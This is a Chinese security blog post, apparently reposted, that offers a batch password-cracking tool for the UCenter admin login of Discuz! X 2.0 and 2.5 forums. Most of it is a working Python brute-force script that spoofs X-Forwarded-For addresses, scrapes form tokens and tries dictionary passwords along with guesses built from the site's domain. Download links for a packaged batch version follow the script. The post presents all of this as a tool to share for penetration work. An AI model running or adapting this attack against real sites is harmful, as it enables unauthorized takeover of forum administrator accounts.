Discuz! X UC 批量破解工具(附送神器下载)

暗月博客 2019年11月21日21:03:18评论743 views字数 2456阅读8分11秒阅读模式
摘要

Discuz! X UC 批量破解工具 (付神器下载) 昨天发了Discuz! X 后台批量破解工具 在学员群交流的时候 ,有的学员提到能不能爆uc的,毕竟这个成功率比后台的成功率

Discuz! X UC 批量破解工具(付神器下载)

昨天发了Discuz! X 后台批量破解工具 在学员群交流的时候 ,有的学员提到能不能爆uc的,毕竟这个成功率比后台的成功率

大大的提高,只是第一次叫我写的时候,其实我是决绝,因为网上已经有类似的程序。

例如,

#coding:utf-8  import httplib,re,random,urllib,time  from sys import argv    # 进行爆破   def getHtml(host,htmlhash,htmlpass,htmlseccode):   ip=str(random.randint(1,100))+"."+str(random.randint(100,244))+"."+str(random.randint(100,244))+"."+str(random.randint(100,244))   postHead={"Host":host,"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0","X-Forwarded-For":ip,'Content-Type':'application/x-www-form-urlencoded','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Connection':'keep-alive'}   postContent='sid=&formhash='+htmlhash+'&seccodehidden='+htmlseccode+'&iframe=0&isfounder=1&password='+htmlpass+'&seccode=cccc&submit=%E7%99%BB+%E5%BD%95'   resultHtml=httplib.HTTPConnection(host, 80, False)   resultHtml.request('POST','/uc_server/admin.php?m=user&a=login',body=postContent,headers = postHead )   page=resultHtml.getresponse()   pageConect=page.read()   return pageConect    #获取 formhash  和  seccodehidden  def gethashs(host):   url='http://'+host+'/uc_server/admin.php'   pageContent=urllib.urlopen(url).read()   r1=re.compile('<input type="hidden" name="formhash" value="(/S+)" />')   htmlhash=r1.findall(pageContent)[0]   r2=re.compile('<input type="hidden" name="seccodehidden" value="(/S+)" />')   htmlseccode=r2.findall(pageContent)[0]   return htmlhash+' '+htmlseccode    #通过argv获取 host 字典 间隔时间 进行爆破  if(len(argv)==1):   print '---->python '+argv[0]+' host地址 字典文件 间隔时间'   print '---->python '+argv[0]+' 192.168.1.105 pass.txt 0.2'  else:   host=argv[1]   passfile=argv[2]   sleeptime=argv[3]   print '网站host为  '+host  #取域名 然后添加一些密码    hostuser=host.split('.')   hostuser=hostuser[len(hostuser)-2]   hostpass=[hostuser+'123',hostuser+'888',hostuser+hostuser,hostuser+'..',hostuser+'.',hostuser+'admin888',hostuser+'admin123',hostuser+'admin',hostuser+'123456']   print '密码字典为  '+passfile   print '间隔时间为  '+sleeptime   print '--->'   x=gethashs(host).split(' ')   f=open(passfile,'r')   htmlpass=f.read().split('/r/n')   htmlpass=hostpass+htmlpass   f.close()   for i in range(len(htmlpass)):    time.sleep(float(sleeptime))    print '正在尝试密码'+htmlpass[i]    if(getHtml(host,x[0],htmlpass[i],x[1])==''):     print '密码为 '+htmlpass[i]     break

其实这个改改就是一个很好的批量了。

后来想了想 ,下了几个dz版本,测试了一下,好像只有几个版本可以。反正就加多一个函数调试了 一会。

发现没有出错,暗月就发出来 给大家共享用用把,这类工具渗透dz的时候可能会给你带来意向不到的收获!

暗月测试的版本 可以使用的成功破解的版本是dzX 2.0 DzX 2.5

Discuz! X UC 批量破解工具(附送神器下载)

listurl.txt 你是填写的url password.txt 当然是我们的密码咯。10就是连接时间timeout

Discuz! X UC 批量破解工具(附送神器下载)

成功的话会在程序目录生成一个crack.txt

Discuz! X UC 批量破解工具(附送神器下载)

神器下载

本地下载

Discuz! X 2.0 2.5 UC 批量破解工具[moon].zip

网盘下载

链接:http://pan.baidu.com/s/1dD1ZcJZ 密码:l4it

通知:  代码审计班 四月结束 需要培训请在4月份前加入!

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日21:03:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Discuz! X UC 批量破解工具(附送神器下载)http://cn-sec.com/archives/72130.html

发表评论

匿名网友 填写信息